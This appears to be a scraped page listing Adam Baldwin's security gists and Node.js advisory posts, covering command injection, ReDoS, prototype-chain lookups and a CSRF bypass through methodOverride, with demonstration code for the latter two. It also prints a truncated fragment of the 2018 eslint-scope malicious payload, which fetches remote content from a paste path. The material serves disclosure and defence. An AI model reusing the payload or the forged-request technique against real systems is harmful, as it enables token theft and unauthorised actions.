Adam Baldwin evilpacket

evilpacket / gist:3628941
Created Sep 5, 2012
Top 1000 from Alexa Top 1million
# Download the Alexa top-1m archive (the URL is not preserved on this page, so it
# is taken as the first argument), keep the domain column (field 2 of rank,domain)
# for the first 1000 rows, then remove the archive and the extracted CSV.
url="$1"
wget -q "$url"
unzip -q "$(basename "$url")"
awk -F ',' '{print $2}' top-1m.csv | head -1000 > top-1000.txt
rm top-1m.csv*
date: 2014-08-19 17:04:34 GMT
tags: security, node.js, injection
title: Avoiding Command Injection in Node.js
author: Adam Baldwin
evilpacket / letter_freq.json
Created Jul 11, 2013
English letter frequencies in json format
"a": 8.167,
"b": 1.492,
"c": 2.782,
"d": 4.253,
"e": 12.702,
"f": 2.228,
"g": 2.015,
"h": 6.094,
"i": 6.966,
evilpacket / gist:9699f0f91443303d98c496d4c9e5b053
(Swedish) Girl with a dragon tattoo
Joe Dante's Explorers (1985)
The imitation game
The KGB, the computer, and me
date: Wed Jan 14 17:30:08 PST 2015
tags: security, node.js, javascript, hapi, RCE, square bracket notation, io.js
title: The Dangers of Square Bracket Notation
author: Jon Lamendola

In this post we look at some peculiar and potentially dangerous implications of JavaScript's square bracket notation: where you shouldn't use this style of object access and why, as well as how to use it safely when it is needed.
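The core hazard, as an added example that is not code from the original page or its author: a dispatch table indexed with `obj[userInput]` walks the prototype chain, so attacker-chosen keys select inherited members the application never registered. The table, the `lookup*` function names and the probe keys are illustrative assumptions; three hardened forms follow the unsafe one.

```javascript
// Added example, not code from the original page or its author. A dispatch
// table keyed by untrusted input, in the unsafe square-bracket form and three
// hardened forms. HANDLERS and the lookup* names are illustrative.

// Actions a web app might expose via ?action=<name>.
const HANDLERS = {
  list: () => "listing items",
  show: () => "showing item",
};

// Unsafe: obj[key] walks the prototype chain, so an attacker-chosen key such
// as "constructor" or "toString" resolves to an inherited function that was
// never registered, and "__proto__" resolves to Object.prototype itself.
// (`key in HANDLERS` has the same problem.)
function lookupUnsafe(action) {
  return HANDLERS[action];
}

// Hardened 1: accept own properties only. Call the prototype method
// explicitly; HANDLERS.hasOwnProperty(action) would itself be reachable
// through a key named "hasOwnProperty".
function lookupOwn(action) {
  return Object.prototype.hasOwnProperty.call(HANDLERS, action)
    ? HANDLERS[action]
    : undefined;
}

// Hardened 2: a prototype-less object has nothing inherited to reach, and
// "__proto__" is just an ordinary (absent) key on it.
const HANDLERS_NULL_PROTO = Object.assign(Object.create(null), HANDLERS);
function lookupNullProto(action) {
  return HANDLERS_NULL_PROTO[action];
}

// Hardened 3: Map.get never consults the prototype chain.
const HANDLER_MAP = new Map(Object.entries(HANDLERS));
function lookupMap(action) {
  return HANDLER_MAP.get(action);
}

// Constructed probe keys: two legitimate actions plus names an attacker could
// put in a query string or JSON body.
const PROBES = ["list", "show", "constructor", "toString", "__proto__"];

// Reports, for each probe, the type of value a lookup hands back. Anything
// other than "function" for a registered action or "undefined" otherwise
// means attacker-controlled data selected an object the app never intended.
// The report object is itself prototype-less: on a plain {} the assignment
// out["__proto__"] = "object" would hit the inherited setter and be dropped.
function probe(lookup) {
  const out = Object.create(null);
  for (const key of PROBES) out[key] = typeof lookup(key);
  return out;
}

// Only invoke a handler that came through a hardened lookup.
function dispatch(action) {
  const handler = lookupMap(action);
  return handler === undefined ? "no such action" : handler();
}
```

Calling `probe(lookupUnsafe)` shows `constructor` and `toString` coming back as functions and `__proto__` as an object, while every hardened variant reports `undefined` for all three and still resolves `list` and `show`.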

date: 2013-09-07 17:03:10 GMT
tags: CSRF, connect, methodOverride, middleware
title: Bypass Connect CSRF protection by abusing methodOverride Middleware
author: Node Security Team

Since our platform isn't set up for advisories that are not specific to a particular module version, but rather to a use or configuration of a certain module, we will announce this issue here and get it into the database at a later date.
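The ordering problem behind this class of bypass, as an added example that is not the advisory's or Connect's code: a CSRF check that exempts GET/HEAD/OPTIONS is only sound if it sees the method the route will act on, so any middleware that rewrites `req.method` has to run before it. The tiny dispatcher, the request shape, and the `_method` query parameter used as the override source are illustrative assumptions and do not reproduce Connect's actual implementation.

```javascript
// Added example, not the advisory's or Connect's code. A minimal model of a
// middleware chain showing why a CSRF check that skips "safe" methods must run
// after any middleware that rewrites req.method. Middleware bodies, request
// shape and the `_method` query parameter are illustrative assumptions.

// CSRF check modelled on the usual rule: GET/HEAD/OPTIONS are exempt, every
// other method must carry a token matching the session.
function csrfCheck(req, res, next) {
  const safe = ["GET", "HEAD", "OPTIONS"];
  if (safe.includes(req.method)) return next();
  if (req.body && req.body._csrf === req.session.csrfToken) return next();
  res.status = 403;
  res.body = "invalid csrf token";
}

// Method override: an `_method` value (taken from the query string here for
// illustration) replaces the real HTTP method for everything downstream.
function methodOverride(req, res, next) {
  const override = req.query && req.query._method;
  if (override) req.method = String(override).toUpperCase();
  next();
}

// A state-changing route that must never run from a forged cross-site GET.
function deleteAccountRoute(req, res, next) {
  if (req.method !== "DELETE") return next();
  res.status = 200;
  res.body = "account deleted";
}

// Synchronous stand-in for connect()/app.use(): runs the stack in order until
// a middleware stops calling next().
function run(stack, req) {
  const res = { status: 404, body: "not found" };
  let i = 0;
  const next = () => {
    const mw = stack[i++];
    if (mw) mw(req, res, next);
  };
  next();
  return res;
}

// Constructed forged request: the victim's browser is steered to
// /account?_method=DELETE. It is a plain GET with no token, and the victim's
// session cookie rides along.
function forgedRequest() {
  return { method: "GET", query: { _method: "DELETE" }, body: {}, session: { csrfToken: "s3cret" } };
}

// Constructed legitimate request: a real DELETE carrying the session's token.
function legitimateRequest() {
  return { method: "DELETE", query: {}, body: { _csrf: "s3cret" }, session: { csrfToken: "s3cret" } };
}

// Vulnerable order: csrfCheck sees GET and exempts it, then methodOverride
// turns the request into DELETE and the route runs.
const VULNERABLE_STACK = [csrfCheck, methodOverride, deleteAccountRoute];

// Hardened order: the override is applied first, so csrfCheck evaluates the
// method the route will actually act on and demands the token.
const HARDENED_STACK = [methodOverride, csrfCheck, deleteAccountRoute];

function forgedResult(stack) {
  return run(stack, forgedRequest());
}

function legitimateResult(stack) {
  return run(stack, legitimateRequest());
}
```

`forgedResult(VULNERABLE_STACK)` returns status 200 with "account deleted"; the same forged request against `HARDENED_STACK` is stopped with 403, while `legitimateResult` succeeds in both orderings. The general rule: every middleware that can change what the request means (method override, body or query parsing that a check relies on) belongs before the check that relies on it.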

date: Mon Nov 03 8:00:00 PDT 2014
tags: security, node.js, redos
title: Regular Expression DoS and Node.js
author: Adam Baldwin

Imagine you are trying to buy a ticket to your favorite JavaScript conference, and instead of the ticket page you get a 500 Internal Server Error. For some reason the site is down. You can't do the thing you most want to do, and the conference is losing out on your purchase, all because the application is unavailable.

evilpacket / gist:3924845
Created Oct 20, 2012
Available Lua functions in Redis 2.6
evilpacket / build.js
Created Jul 13, 2018
eslint-scope payload
try {
var https = require("https");
hostname: "",
path: "/raw/XLeVP82h",
headers: {
"Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0",
binary + download count
ws: 18300469
fsevents: 17784701
gaze: 11832681
node-sass: 8865218
bson: 2686185
uws: 2360991
dtrace-provider: 1567984
pg: 1407674
grpc: 1137348
iltorb: 932043